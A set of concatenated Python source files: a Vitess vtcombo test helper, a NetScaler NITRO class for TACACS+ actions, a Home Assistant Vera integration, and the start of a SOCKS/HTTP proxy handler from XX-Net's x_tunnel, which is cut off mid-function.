'-queryserver-config-query-timeout', '300',
'-queryserver-config-schema-reload-time', '60',
'-queryserver-config-stream-pool-size', '4',
'-queryserver-config-transaction-cap', '4',
'-queryserver-config-transaction-timeout', '300',
'-queryserver-config-txpool-timeout', '300',
]
def __init__(self, directory, shards, mysql_db, vschema, charset,
web_dir=None):
VtProcess.__init__(self, 'vtcombo-%s' % os.environ['USER'], directory,
environment.vtcombo_binary, port_name='vtcombo')
topology = ','.join(['%s/%s:%s' % (shard.keyspace, shard.name,
shard.db_name) for shard in shards])
self.extraparams = [
'-db-config-app-charset', charset,
'-db-config-app-uname', mysql_db.username(),
'-db-config-app-pass', mysql_db.password(),
'-topology', topology,
'-mycnf_server_id', '1',
'-mycnf_socket_file', mysql_db.unix_socket(),
] + self.QUERYSERVER_PARAMETERS + environment.extra_vtcombo_parameters()
if vschema:
self.extraparams.extend(['-vschema', vschema])
if web_dir:
self.extraparams.extend(['-web_dir', web_dir])
if mysql_db.unix_socket():
self.extraparams.extend(
['-db-config-app-unixsocket', mysql_db.unix_socket()])
else:
self.extraparams.extend(
['-db-config-app-host', mysql_db.hostname(),
'-db-config-app-port', str(mysql_db.port())])
vtcombo_process = None
def start_vt_processes(directory, shards, mysql_db, vschema,
charset='utf8', web_dir=None):
"""Start the vt processes.
Parameters:
directory: the toplevel directory for the processes (logs, ...)
shards: an array of ShardInfo objects.
mysql_db: an instance of the mysql_db.MySqlDB class.
charset: the character set for the database connections.
web_dir: contains the web app for vtctld side of vtcombo.
"""
global vtcombo_process
logging.info('start_vt_processes(directory=%s,vtcombo_binary=%s)',
directory, environment.vtcombo_binary)
vtcombo_process = VtcomboProcess(directory, shards, mysql_db, vschema,
charset, web_dir=web_dir)
vtcombo_process.wait_start()
def kill_vt_processes():
"""Call kill() on all processes."""
logging.info('kill_vt_processes()')
if vtcombo_process:
vtcombo_process.kill()
def wait_vt_processes():
"""Call wait() on all processes."""
logging.info('wait_vt_processes()')
if vtcombo_process:
vtcombo_process.wait()
def kill_and_wait_vt_processes():
"""Call kill() and then wait() on all processes."""
kill_vt_processes()
wait_vt_processes()
# wait_step is a helper for looping until a condition is true.
# use as follows:
# timeout = 10
# while True:
# if done:
# break
# timeout = utils.wait_step('condition', timeout)
def wait_step(msg, timeout, sleep_time=1.0):
timeout -= sleep_time
if timeout <= 0:
raise Exception("timeout waiting for condition '%s'" % msg)
logging.debug("Sleeping for %f seconds waiting for condition '%s'",
sleep_time, msg)
time.sleep(sleep_time)
return timeout
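# A hedged lifecycle sketch using the helpers above; the directory and
# mysql_db arguments are assumed to be provided by the caller, and the shard
# values are illustrative only.
def _example_lifecycle(directory, mysql_db):
    shards = [ShardInfo('test_keyspace', '0', 'vt_test_keyspace_0')]
    start_vt_processes(directory, shards, mysql_db, vschema=None)
    try:
        pass  # run test queries against vtcombo here
    finally:
        kill_and_wait_vt_processes()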
|
|
#
# Copyright (c) 2008-2015 Citrix Systems, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License")
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from nssrc.com.citrix.netscaler.nitro.resource.base.base_resource import base_resource
from nssrc.com.citrix.netscaler.nitro.resource.base.base_resource import base_response
from nssrc.com.citrix.netscaler.nitro.service.options import options
from nssrc.com.citrix.netscaler.nitro.exception.nitro_exception import nitro_exception
from nssrc.com.citrix.netscaler.nitro.util.nitro_util import nitro_util
class authenticationtacacsaction(base_resource) :
""" Configuration for TACACS action resource. """
def __init__(self) :
self._name = ""
self._serverip = ""
self._serverport = 0
self._authtimeout = 0
self._tacacssecret = ""
self._authorization = ""
self._accounting = ""
self._auditfailedcmds = ""
self._defaultauthenticationgroup = ""
self._success = 0
self._failure = 0
self.___count = 0
@property
def name(self) :
"""Name for the TACACS+ profile (action).
Must begin with a letter, number, or the underscore character (_), and must contain only letters, numbers, and the hyphen (-), period (.) pound (#), space ( ), at (@), equals (=), colon (:), and underscore characters. Cannot be changed after TACACS profile is created.
The following requirement applies only to the NetScaler CLI:
If the name includes one or more spaces, enclose the name in double or single quotation marks (for example, "my authentication action" or 'my authentication action').<br/>Minimum length = 1.
"""
try :
return self._name
except Exception as e:
raise e
@name.setter
def name(self, name) :
"""Name for the TACACS+ profile (action).
Must begin with a letter, number, or the underscore character (_), and must contain only letters, numbers, and the hyphen (-), period (.) pound (#), space ( ), at (@), equals (=), colon (:), and underscore characters. Cannot be changed after TACACS profile is created.
The following requirement applies only to the NetScaler CLI:
If the name includes one or more spaces, enclose the name in double or single quotation marks (for example, "my authentication action" or 'my authentication action').<br/>Minimum length = 1
"""
try :
self._name = name
except Exception as e:
raise e
@property
def serverip(self) :
"""IP address assigned to the TACACS+ server.<br/>Minimum length = 1.
"""
try :
return self._serverip
except Exception as e:
raise e
@serverip.setter
def serverip(self, serverip) :
"""IP address assigned to the TACACS+ server.<br/>Minimum length = 1
"""
try :
self._serverip = serverip
except Exception as e:
raise e
@property
def serverport(self) :
"""Port number on which the TACACS+ server listens for connections.<br/>Default value: 49<br/>Minimum length = 1.
"""
try :
return self._serverport
except Exception as e:
raise e
@serverport.setter
def serverport(self, serverport) :
"""Port number on which the TACACS+ server listens for connections.<br/>Default value: 49<br/>Minimum length = 1
"""
try :
self._serverport = serverport
except Exception as e:
raise e
@property
def authtimeout(self) :
"""Number of seconds the NetScaler appliance waits for a response from the TACACS+ server.<br/>Default value: 3<br/>Minimum length = 1.
"""
try :
return self._authtimeout
except Exception as e:
raise e
@authtimeout.setter
def authtimeout(self, authtimeout) :
"""Number of seconds the NetScaler appliance waits for a response from the TACACS+ server.<br/>Default value: 3<br/>Minimum length = 1
"""
try :
self._authtimeout = authtimeout
except Exception as e:
raise e
@property
def tacacssecret(self) :
"""Key shared between the TACACS+ server and the NetScaler appliance.
Required for allowing the NetScaler appliance to communicate with the TACACS+ server.<br/>Minimum length = 1.
"""
try :
return self._tacacssecret
except Exception as e:
raise e
@tacacssecret.setter
def tacacssecret(self, tacacssecret) :
"""Key shared between the TACACS+ server and the NetScaler appliance.
Required for allowing the NetScaler appliance to communicate with the TACACS+ server.<br/>Minimum length = 1
"""
try :
self._tacacssecret = tacacssecret
except Exception as e:
raise e
@property
def authorization(self) :
"""Use streaming authorization on the TACACS+ server.<br/>Possible values = ON, OFF.
"""
try :
return self._authorization
except Exception as e:
raise e
@authorization.setter
def authorization(self, authorization) :
"""Use streaming authorization on the TACACS+ server.<br/>Possible values = ON, OFF
"""
try :
self._authorization = authorization
except Exception as e:
raise e
@property
def accounting(self) :
"""Whether the TACACS+ server is currently accepting accounting messages.<br/>Possible values = ON, OFF.
"""
try :
return self._accounting
except Exception as e:
raise e
@accounting.setter
def accounting(self, accounting) :
"""Whether the TACACS+ server is currently accepting accounting messages.<br/>Possible values = ON, OFF
"""
try :
self._accounting = accounting
except Exception as e:
raise e
@property
def auditfailedcmds(self) :
"""The state of the TACACS+ server that will receive accounting messages.<br/>Possible values = ON, OFF.
"""
try :
return self._auditfailedcmds
except Exception as e:
raise e
@auditfailedcmds.setter
def auditfailedcmds(self, auditfailedcmds) :
"""The state of the TACACS+ server that will receive accounting messages.<br/>Possible values = ON, OFF
"""
try :
self._auditfailedcmds = auditfailedcmds
except Exception as e:
raise e
@property
def defaultauthenticationgroup(self) :
"""This is the default group that is chosen when the authentication succeeds in addition to extracted groups.<br/>Maximum length = 64.
"""
try :
return self._defaultauthenticationgroup
except Exception as e:
raise e
@defaultauthenticationgroup.setter
def defaultauthenticationgroup(self, defaultauthenticationgroup) :
"""This is the default group that is chosen when the authentication succeeds in addition to extracted groups.<br/>Maximum length = 64
"""
try :
self._defaultauthenticationgroup = defaultauthenticationgroup
except Exception as e:
raise e
@property
def success(self) :
try :
return self._success
except Exception as e:
raise e
@property
def failure(self) :
try :
return self._failure
except Exception as e:
raise e
def _get_nitro_response(self, service, response) :
""" converts nitro response into object and returns the object array in case of get request.
"""
try :
result = service.payload_formatter.string_to_resource(authenticationtacacsaction_response, response, self.__class__.__name__)
if(result.errorcode != 0) :
if (result.errorcode == 444) :
service.clear_session(self)
if result.severity :
if (result.severity == "ERROR") :
raise nitro_exception(result.errorcode, str(result.message), str(result.severity))
else :
raise nitro_exception(result.errorcode, str(result.message), str(result.severity))
return result.authenticationtacacsaction
except Exception as e :
raise e
def _get_object_name(self) :
""" Returns the value of object identifier argument
"""
try :
if (self.name) :
return str(self.name)
return None
except Exception as e :
raise e
@classmethod
def add(cls, client, resource) :
""" Use this API to add authenticationtacacsaction.
"""
try :
if type(resource) is not list :
addresource = authenticationtacacsaction()
addresource.name = resource.name
addresource.serverip = resource.serverip
addresource.serverport = resource.serverport
addresource.authtimeout = resource.authtimeout
addresource.tacacssecret = resource.tacacssecret
addresource.authorization = resource.authorization
addresource.accounting = resource.accounting
addresource.auditfailedcmds = resource.auditfailedcmds
addresource.defaultauthenticationgroup = resource.defaultauthenticationgroup
return addresource.add_resource(client)
else :
if (resource and len(resource) > 0) :
addresources = [ authenticationtacacsaction() for _ in range(len(resource))]
for i in range(len(resource)) :
addresources[i].name = resource[i].name
addresources[i].serverip = resource[i].serverip
addresources[i].serverport = resource[i].serverport
addresources[i].authtimeout = resource[i].authtimeout
addresources[i].tacacssecret = resource[i].tacacssecret
addresources[i].authorization = resource[i].authorization
addresources[i].accounting = resource[i].accounting
addresources[i].auditfailedcmds = resource[i].auditfailedcmds
addresources[i].defaultauthenticationgroup = resource[i].defaultauthenticationgroup
result = cls.add_bulk_request(client, addresources)
return result
except Exception as e :
raise e
@classmethod
def delete(cls, client, resource) :
""" Use this API to delete authenticationtacacsaction.
"""
try :
if type(resource) is not list :
deleteresource = authenticationtacacsaction()
if type(resource) != type(deleteresource):
deleteresource.name = resource
else :
deleteresource.name = resource.name
return deleteresource.delete_resource(client)
else :
if type(resource[0]) != cls :
if (resource and len(resource) > 0) :
deleteresources = [ authenticationtacacsaction() for _ in range(len(resource))]
for i in range(len(resource)) :
deleteresources[i].name = resource[i]
else :
if (resource and len(resource) > 0) :
deleteresources = [ authenticationtacacsaction() for _ in range(len(resource))]
for i in range(len(resource)) :
deleteresources[i].name = resource[i].name
result = cls.delete_bulk_request(client, deleteresources)
return result
except Exception as e :
raise e
@classmethod
def update(cls, client, resource) :
""" Use this API to update authenticationtacacsaction.
"""
try :
if type(resource) is not list :
updateresource = authenticationtacacsaction()
updateresource.name = resource.name
updateresource.serverip = resource.serverip
updateresource.serverport = resource.serverport
updateresource.authtimeout = resource.authtimeout
updateresource.tacacssecret = resource.tacacssecret
updateresource.authorization = resource.authorization
updateresource.accounting = resource.accounting
updateresource.auditfailedcmds = resource.auditfailedcmds
updateresource.defaultauthenticationgroup = resource.defaultauthenticationgroup
return updateresource.update_resource(client)
else :
if (resource and len(resource) > 0) :
updateresources = [ authenticationtacacsaction() for _ in range(len(resource))]
for i in range(len(resource)) :
updateresources[i].name = resource[i].name
updateresources[i].serverip = resource[i].serverip
updateresources[i].serverport = resource[i].serverport
updateresources[i].authtimeout = resource[i].authtimeout
updateresources[i].tacacssecret = resource[i].tacacssecret
updateresources[i].authorization = resource[i].authorization
updateresources[i].accounting = resource[i].accounting
updateresources[i].auditfailedcmds = resource[i].auditfailedcmds
updateresources[i].defaultauthenticationgroup = resource[i].defaultauthenticationgroup
result = cls.update_bulk_request(client, updateresources)
return result
except Exception as e :
raise e
@classmethod
def unset(cls, client, resource, args) :
""" Use this API to unset the properties of authenticationtacacsaction resource.
Properties that need to be unset are specified in args array.
"""
try :
if type(resource) is not list :
unsetresource = authenticationtacacsaction()
if type(resource) != type(unsetresource):
unsetresource.name = resource
else :
unsetresource.name = resource.name
return unsetresource.unset_resource(client, args)
else :
if type(resource[0]) != cls :
if (resource and len(resource) > 0) :
unsetresources = [ authenticationtacacsaction() for _ in range(len(resource))]
for i in range(len(resource)) :
unsetresources[i].name = resource[i]
else :
if (resource and len(resource) > 0) :
unsetresources = [ authenticationtacacsaction() for _ in range(len(resource))]
for i in range(len(resource)) :
unsetresources[i].name = resource[i].name
result = cls.unset_bulk_request(client, unsetresources, args)
return result
except Exception as e :
raise e
@classmethod
def get(cls, client, name="", option_="") :
""" Use this API to fetch all the authenticationtacacsaction resources that are configured on netscaler.
"""
try :
if not name :
obj = authenticationtacacsaction()
response = obj.get_resources(client, option_)
else :
if type(name) != cls :
if type(name) is not list :
obj = authenticationtacacsaction()
obj.name = name
response = obj.get_resource(client, option_)
else :
if name and len(name) > 0 :
response = [authenticationtacacsaction() for _ in range(len(name))]
obj = [authenticationtacacsaction() for _ in range(len(name))]
for i in range(len(name)) :
obj[i] = authenticationtacacsaction()
obj[i].name = name[i]
response[i] = obj[i].get_resource(client, option_)
return response
except Exception as e :
raise e
@classmethod
def get_filtered(cls, client, filter_) :
""" Use this API to fetch filtered set of authenticationtacacsaction resources.
filter string should be in JSON format.eg: "port:80,servicetype:HTTP".
"""
try :
obj = authenticationtacacsaction()
option_ = options()
option_.filter = filter_
response = obj.getfiltered(client, option_)
return response
except Exception as e :
raise e
@classmethod
def count(cls, client) :
""" Use this API to count the authenticationtacacsaction resources configured on NetScaler.
"""
try :
obj = authenticationtacacsaction()
option_ = options()
option_.count = True
response = obj.get_resources(client, option_)
if response :
return response[0].__dict__['___count']
return 0
except Exception as e :
raise e
@classmethod
def count_filtered(cls, client, filter_) :
""" Use this API to count filtered the set of authenticationtacacsaction resources.
Filter string should be in JSON format.eg: "port:80,servicetype:HTTP".
"""
try :
obj = authenticationtacacsaction()
option_ = options()
option_.count = True
option_.filter = filter_
response = obj.getfiltered(client, option_)
if response :
return response[0].__dict__['___count']
return 0
except Exception as e :
raise e
class Auditfailedcmds:
ON = "ON"
OFF = "OFF"
class Authorization:
ON = "ON"
OFF = "OFF"
class Accounting:
ON = "ON"
OFF = "OFF"
class authenticationtacacsaction_response(base_response) :
def __init__(self, length=1) :
self.authenticationtacacsaction = []
self.errorcode = 0
self.message = ""
self.severity = ""
self.sessionid = ""
self.authenticationtacacsaction = [authenticationtacacsaction() for _ in range(length)]
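# A hedged usage sketch; "client" is assumed to be an already authenticated
# nitro_service instance, and all values below are placeholders:
#
#   action = authenticationtacacsaction()
#   action.name = "tacacs_act1"
#   action.serverip = "10.0.0.2"
#   action.serverport = 49
#   action.tacacssecret = "secret"
#   authenticationtacacsaction.add(client, action)
#   fetched = authenticationtacacsaction.get(client, "tacacs_act1")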
|
|
"""Support for Vera devices."""
import asyncio
from collections import defaultdict
import logging
from typing import Any, Dict, Generic, List, Optional, Type, TypeVar
import pyvera as veraApi
from requests.exceptions import RequestException
import voluptuous as vol
from homeassistant import config_entries
from homeassistant.config_entries import ConfigEntry
from homeassistant.const import (
ATTR_ARMED,
ATTR_BATTERY_LEVEL,
ATTR_LAST_TRIP_TIME,
ATTR_TRIPPED,
CONF_EXCLUDE,
CONF_LIGHTS,
EVENT_HOMEASSISTANT_STOP,
)
from homeassistant.core import HomeAssistant
from homeassistant.exceptions import ConfigEntryNotReady
from homeassistant.helpers import config_validation as cv
from homeassistant.helpers.entity import Entity
from homeassistant.util import convert, slugify
from homeassistant.util.dt import utc_from_timestamp
from .common import (
ControllerData,
SubscriptionRegistry,
get_configured_platforms,
get_controller_data,
set_controller_data,
)
from .config_flow import fix_device_id_list, new_options
from .const import (
ATTR_CURRENT_ENERGY_KWH,
ATTR_CURRENT_POWER_W,
CONF_CONTROLLER,
CONF_LEGACY_UNIQUE_ID,
DOMAIN,
VERA_ID_FORMAT,
)
_LOGGER = logging.getLogger(__name__)
VERA_ID_LIST_SCHEMA = vol.Schema([int])
CONFIG_SCHEMA = vol.Schema(
{
DOMAIN: vol.Schema(
{
vol.Required(CONF_CONTROLLER): cv.url,
vol.Optional(CONF_EXCLUDE, default=[]): VERA_ID_LIST_SCHEMA,
vol.Optional(CONF_LIGHTS, default=[]): VERA_ID_LIST_SCHEMA,
}
)
},
extra=vol.ALLOW_EXTRA,
)
async def async_setup(hass: HomeAssistant, base_config: dict) -> bool:
"""Set up for Vera controllers."""
hass.data[DOMAIN] = {}
config = base_config.get(DOMAIN)
if not config:
return True
hass.async_create_task(
hass.config_entries.flow.async_init(
DOMAIN,
context={"source": config_entries.SOURCE_IMPORT},
data=config,
)
)
return True
async def async_setup_entry(hass: HomeAssistant, config_entry: ConfigEntry) -> bool:
"""Do setup of vera."""
# Use options entered during initial config flow or provided from configuration.yaml
if config_entry.data.get(CONF_LIGHTS) or config_entry.data.get(CONF_EXCLUDE):
hass.config_entries.async_update_entry(
entry=config_entry,
data=config_entry.data,
options=new_options(
config_entry.data.get(CONF_LIGHTS, []),
config_entry.data.get(CONF_EXCLUDE, []),
),
)
saved_light_ids = config_entry.options.get(CONF_LIGHTS, [])
saved_exclude_ids = config_entry.options.get(CONF_EXCLUDE, [])
base_url = config_entry.data[CONF_CONTROLLER]
light_ids = fix_device_id_list(saved_light_ids)
exclude_ids = fix_device_id_list(saved_exclude_ids)
# If the ids were corrected, update the config entry.
if light_ids != saved_light_ids or exclude_ids != saved_exclude_ids:
hass.config_entries.async_update_entry(
entry=config_entry, options=new_options(light_ids, exclude_ids)
)
# Initialize the Vera controller.
subscription_registry = SubscriptionRegistry(hass)
controller = veraApi.VeraController(base_url, subscription_registry)
try:
all_devices = await hass.async_add_executor_job(controller.get_devices)
all_scenes = await hass.async_add_executor_job(controller.get_scenes)
except RequestException as exception:
# There was a network related error connecting to the Vera controller.
_LOGGER.exception("Error communicating with Vera API")
raise ConfigEntryNotReady from exception
# Exclude devices unwanted by user.
devices = [device for device in all_devices if device.device_id not in exclude_ids]
vera_devices = defaultdict(list)
for device in devices:
device_type = map_vera_device(device, light_ids)
if device_type is not None:
vera_devices[device_type].append(device)
vera_scenes = []
for scene in all_scenes:
vera_scenes.append(scene)
controller_data = ControllerData(
controller=controller,
devices=vera_devices,
scenes=vera_scenes,
config_entry=config_entry,
)
set_controller_data(hass, config_entry, controller_data)
# Forward the config data to the necessary platforms.
for platform in get_configured_platforms(controller_data):
hass.async_create_task(
hass.config_entries.async_forward_entry_setup(config_entry, platform)
)
def stop_subscription(event):
"""Stop SubscriptionRegistry updates."""
controller.stop()
await hass.async_add_executor_job(controller.start)
hass.bus.async_listen_once(EVENT_HOMEASSISTANT_STOP, stop_subscription)
return True
async def async_unload_entry(hass: HomeAssistant, config_entry: ConfigEntry) -> bool:
"""Unload Withings config entry."""
controller_data: ControllerData = get_controller_data(hass, config_entry)
tasks = [
hass.config_entries.async_forward_entry_unload(config_entry, platform)
for platform in get_configured_platforms(controller_data)
]
tasks.append(hass.async_add_executor_job(controller_data.controller.stop))
await asyncio.gather(*tasks)
return True
def map_vera_device(vera_device: veraApi.VeraDevice, remap: List[int]) -> str:
"""Map vera classes to Home Assistant types."""
type_map = {
veraApi.VeraDimmer: "light",
veraApi.VeraBinarySensor: "binary_sensor",
veraApi.VeraSensor: "sensor",
veraApi.VeraArmableDevice: "switch",
veraApi.VeraLock: "lock",
veraApi.VeraThermostat: "climate",
veraApi.VeraCurtain: "cover",
veraApi.VeraSceneController: "sensor",
veraApi.VeraSwitch: "switch",
}
def map_special_case(instance_class: Type, entity_type: str) -> str:
if instance_class is veraApi.VeraSwitch and vera_device.device_id in remap:
return "light"
return entity_type
return next(
iter(
map_special_case(instance_class, entity_type)
for instance_class, entity_type in type_map.items()
if isinstance(vera_device, instance_class)
),
None,
)
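# Hedged illustration of the special case above: a VeraSwitch whose id is in
# the configured lights list maps to "light"; any other VeraSwitch maps to
# "switch" (the device objects below are assumed to exist):
#
#   map_vera_device(switch_device, remap=[switch_device.device_id])  # -> "light"
#   map_vera_device(switch_device, remap=[])                         # -> "switch"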
DeviceType = TypeVar("DeviceType", bound=veraApi.VeraDevice)
class VeraDevice(Generic[DeviceType], Entity):
"""Representation of a Vera device entity."""
def __init__(self, vera_device: DeviceType, controller_data: ControllerData):
"""Initialize the device."""
self.vera_device = vera_device
self.controller = controller_data.controller
self._name = self.vera_device.name
# Append device id to prevent name clashes in HA.
self.vera_id = VERA_ID_FORMAT.format(
slugify(vera_device.name), vera_device.vera_device_id
)
if controller_data.config_entry.data.get(CONF_LEGACY_UNIQUE_ID):
self._unique_id = str(self.vera_device.vera_device_id)
else:
self._unique_id = f"vera_{controller_data.config_entry.unique_id}_{self.vera_device.vera_device_id}"
async def async_added_to_hass(self) -> None:
"""Subscribe to updates."""
self.controller.register(self.vera_device, self._update_callback)
def _update_callback(self, _device: DeviceType) -> None:
"""Update the state."""
self.schedule_update_ha_state(True)
def update(self):
"""Force a refresh from the device if the device is unavailable."""
if not self.available:
self.vera_device.refresh()
@property
def name(self) -> str:
"""Return the name of the device."""
return self._name
@property
def should_poll(self) -> bool:
"""Get polling requirement from vera device."""
return self.vera_device.should_poll
@property
def device_state_attributes(self) -> Optional[Dict[str, Any]]:
"""Return the state attributes of the device."""
attr = {}
if self.vera_device.has_battery:
attr[ATTR_BATTERY_LEVEL] = self.vera_device.battery_level
if self.vera_device.is_armable:
armed = self.vera_device.is_armed
attr[ATTR_ARMED] = "True" if armed else "False"
if self.vera_device.is_trippable:
last_tripped = self.vera_device.last_trip
if last_tripped is not None:
utc_time = utc_from_timestamp(int(last_tripped))
attr[ATTR_LAST_TRIP_TIME] = utc_time.isoformat()
else:
attr[ATTR_LAST_TRIP_TIME] = None
tripped = self.vera_device.is_tripped
attr[ATTR_TRIPPED] = "True" if tripped else "False"
power = self.vera_device.power
if power:
attr[ATTR_CURRENT_POWER_W] = convert(power, float, 0.0)
energy = self.vera_device.energy
if energy:
attr[ATTR_CURRENT_ENERGY_KWH] = convert(energy, float, 0.0)
attr["Vera Device Id"] = self.vera_device.vera_device_id
return attr
@property
def available(self):
"""If device communications have failed return false."""
return not self.vera_device.comm_failure
@property
def unique_id(self) -> str:
"""Return a unique ID.
The Vera assigns a unique and immutable ID number to each device.
"""
return self._unique_id
|
|
import time
import socket
import struct
import urlparse
import select
import utils
from xlog import getLogger
xlog = getLogger("x_tunnel")
import global_var as g
import proxy_session
def netloc_to_host_port(netloc, default_port=80):
if ":" in netloc:
host, _, port = netloc.rpartition(':')
port = int(port)
else:
host = netloc
port = default_port
return host, port
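# For example: netloc_to_host_port("example.com:8443") -> ("example.com", 8443)
#              netloc_to_host_port("example.com")      -> ("example.com", 80)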
class Socks5Server():
handle_num = 0
def __init__(self, sock, client, args):
self.connection = sock
self.rfile = socket._fileobject(self.connection, "rb", -1)
self.wfile = socket._fileobject(self.connection, "wb", 0)
self.client_address = client
self.read_buffer = ""
self.buffer_start = 0
self.args = args
def handle(self):
self.__class__.handle_num += 1
try:
r, w, e = select.select([self.connection], [], [])
socks_version = self.read_bytes(1)
if not socks_version:
return
if socks_version == "\x04":
self.socks4_handler()
elif socks_version == "\x05":
self.socks5_handler()
elif socks_version == "C":
self.https_handler()
elif socks_version in ["G", "P", "D", "O", "H", "T"]:
self.http_handler(socks_version)
return
else:
xlog.warn("socks version:%s not supported", utils.str2hex(socks_version))
return
except socket.error as e:
xlog.debug('socks handler read error %r', e)
return
except Exception as e:
xlog.exception("any err:%r", e)
def read_null_end_line(self):
sock = self.connection
sock.setblocking(0)
try:
while True:
n1 = self.read_buffer.find("\x00", self.buffer_start)
if n1 > -1:
line = self.read_buffer[self.buffer_start:n1]
self.buffer_start = n1 + 1
return line
try:
data = sock.recv(8192)
except socket.error as e:
# logging.exception("e:%r", e)
if e.errno in [2, 11, 10035]:
time.sleep(0.01)
continue
else:
raise e
self.read_buffer += data
finally:
sock.setblocking(1)
def read_crlf_line(self):
sock = self.connection
sock.setblocking(0)
try:
while True:
n1 = self.read_buffer.find("\r\n", self.buffer_start)
if n1 > -1:
line = self.read_buffer[self.buffer_start:n1]
self.buffer_start = n1 + 2
return line
try:
data = sock.recv(8192)
except socket.error as e:
# logging.exception("e:%r", e)
if e.errno in [2, 11, 10035]:
time.sleep(0.01)
continue
else:
raise e
self.read_buffer += data
finally:
sock.setblocking(1)
def read_headers(self):
sock = self.connection
sock.setblocking(0)
try:
while True:
if self.read_buffer[self.buffer_start:] == "\r\n":
self.buffer_start += 2
return ""
n1 = self.read_buffer.find("\r\n\r\n", self.buffer_start)
if n1 > -1:
block = self.read_buffer[self.buffer_start:n1]
self.buffer_start = n1 + 4
return block
try:
data = sock.recv(8192)
except socket.error as e:
# logging.exception("e:%r", e)
if e.errno in [2, 11, 10035]:
time.sleep(0.01)
continue
else:
raise e
self.read_buffer += data
finally:
sock.setblocking(1)
def read_bytes(self, size):
sock = self.connection
sock.setblocking(1)
try:
while True:
left = len(self.read_buffer) - self.buffer_start
if left >= size:
break
need = size - left
try:
data = sock.recv(need)
except socket.error as e:
# logging.exception("e:%r", e)
if e.errno in [2, 11, 10035]:
time.sleep(0.01)
continue
else:
raise e
if len(data):
self.read_buffer += data
else:
raise socket.error("recv fail")
finally:
sock.setblocking(1)
data = self.read_buffer[self.buffer_start:self.buffer_start + size]
self.buffer_start += size
return data
def socks4_handler(self):
# Socks4 or Socks4a
sock = self.connection
cmd = ord(self.read_bytes(1))
if cmd != 1:
xlog.warn("Socks4 cmd:%d not supported", cmd)
return
data = self.read_bytes(6)
port = struct.unpack(">H", data[0:2])[0]
addr_pack = data[2:6]
if addr_pack[0:3] == '\x00\x00\x00' and addr_pack[3] != '\x00':
domain_mode = True
else:
ip = socket.inet_ntoa(addr_pack)
domain_mode = False
user_id = self.read_null_end_line()
if len(user_id):
xlog.debug("Socks4 user_id:%s", user_id)
if domain_mode:
addr = self.read_null_end_line()
else:
addr = ip
conn_id = proxy_session.create_conn(sock, addr, port)
if not conn_id:
xlog.warn("Socks4 connect fail, no conn_id")
reply = b"\x00\x5b\x00" + addr_pack + struct.pack(">H", port)
sock.send(reply)
return
xlog.info("Socks4:%r to %s:%d, conn_id:%d", self.client_address, addr, port, conn_id)
reply = b"\x00\x5a" + addr_pack + struct.pack(">H", port)
sock.send(reply)
if len(self.read_buffer) - self.buffer_start:
g.session.conn_list[conn_id].transfer_received_data(self.read_buffer[self.buffer_start:])
g.session.conn_list[conn_id].start(block=True)
def socks5_handler(self):
sock = self.connection
auth_mode_num = ord(self.read_bytes(1))
data = self.read_bytes(auth_mode_num)
sock.send(b"\x05\x00") # socks version 5, no auth needed.
try:
data = self.read_bytes(4)
except Exception as e:
xlog.debug("socks5 auth num:%d, list:%s", auth_mode_num, utils.str2hex(data))
xlog.warn("socks5 protocol error:%r", e)
return
socks_version = ord(data[0])
if socks_version != 5:
xlog.warn("request version:%d error", socks_version)
return
command = ord(data[1])
if command != 1: # 1. Tcp connect
xlog.warn("request not supported command mode:%d", command)
sock.send(b"\x05\x07\x00\x01") # Command not supported
return
addrtype_pack = data[3]
addrtype = ord(addrtype_pack)
if addrtype == 1: # IPv4
addr_pack = self.read_bytes(4)
addr = socket.inet_ntoa(addr_pack)
elif addrtype == 3: # Domain name
domain_len_pack = self.read_bytes(1)[0]
domain_len = ord(domain_len_pack)
domain = self.read_bytes(domain_len)
addr_pack = domain_len_pack + domain
addr = domain
elif addrtype == 4: # IPv6
addr_pack = self.read_bytes(16)
addr = socket.inet_ntop(socket.AF_INET6, addr_pack)
else:
xlog.warn("request address type unknown:%d", addrtype)
sock.send(b"\x05\x07\x00\x01") # Command not supported
return
port = struct.unpack('>H', self.read_bytes(2))[0]  # read via the shared buffer so no bytes are stranded in rfile
conn_id = proxy_session.create_conn(sock, addr, port)
if not conn_id:
xlog.warn("create conn fail")
reply = b"\x05\x01\x00" + addrtype_pack + addr_pack + struct.pack(">H", port)
sock.send(reply)
return
xlog.info("socks5 %r connect to %s:%d conn_id:%d", self.client_address, addr, port, conn_id)
reply = b"\x05\x00\x00" + addrtype_pack + addr_pack + struct.pack(">H", port)
sock.send(reply)
if len(self.read_buffer) - self.buffer_start:
g.session.conn_list[conn_id].transfer_received_data(self.read_buffer[self.buffer_start:])
g.session.conn_list[conn_id].start(block=True)
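# For reference, the SOCKS5 exchange handled above (RFC 1928), with the
# version byte already consumed by handle():
#   greeting : NMETHODS, METHODS...               -> reply 05 00 (no auth)
#   request  : VER CMD RSV ATYP DST.ADDR DST.PORT (CMD 01 = CONNECT)
#   reply    : VER REP RSV ATYP BND.ADDR BND.PORT (REP 00 = succeeded)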
def https_handler(self):
line = self.read_crlf_line()
line = line.decode('iso-8859-1')
words = line.split()
if len(words) == 3:
command, path, version = words
elif len(words) == 2:
command, path = words
version = "HTTP/1.1"
else:
xlog.warn("https req line fail:%s", line)
return
if command != "ONNECT":
xlog.warn("https req line fail:%s", line)
return
host, _, port = path.rpartition(':')
host = host.encode()
port = int(port)
header_block = self.read_headers()
sock = self.connection
conn_id = proxy_session.create_conn(sock, host, port)
if not conn_id:
xlog.warn("create conn fail")
sock.send(b'HTTP/1.1 500 Fail\r\n\r\n')
return
xlog.info("https %r connect to %s:%d conn_id:%d", self.client_address, host, port, conn_id)
try:
sock.send(b'HTTP/1.1 200 OK\r\n\r\n')
except:
xlog.warn("https %r connect to %s:%d conn_id:%d closed.", self.client_address, host, port, conn_id)
if (len(self.read_buffer) - self.buffer_start) > 0:
g.session.conn_list[conn_id].transfer_received_data(self.read_buffer[self.buffer_start:])
g.session.conn_list[conn_id].start(block=True)
def http_handler(self, first_char):
req_line = self.read_crlf_line()
words = req_line.split()
if len(words) == 3:
method, url, http_version = words
elif len(words) == 2:
method, url = words
http_version = "HTTP/1.1"
else:
xlog.warn("http req line fail:%s", req_line)
return
method = first_char + method
# if method not in ["GET", "HEAD", "POST", "PUT", "DELETE", "OPTIONS", "TRACE", "PATCH"]:
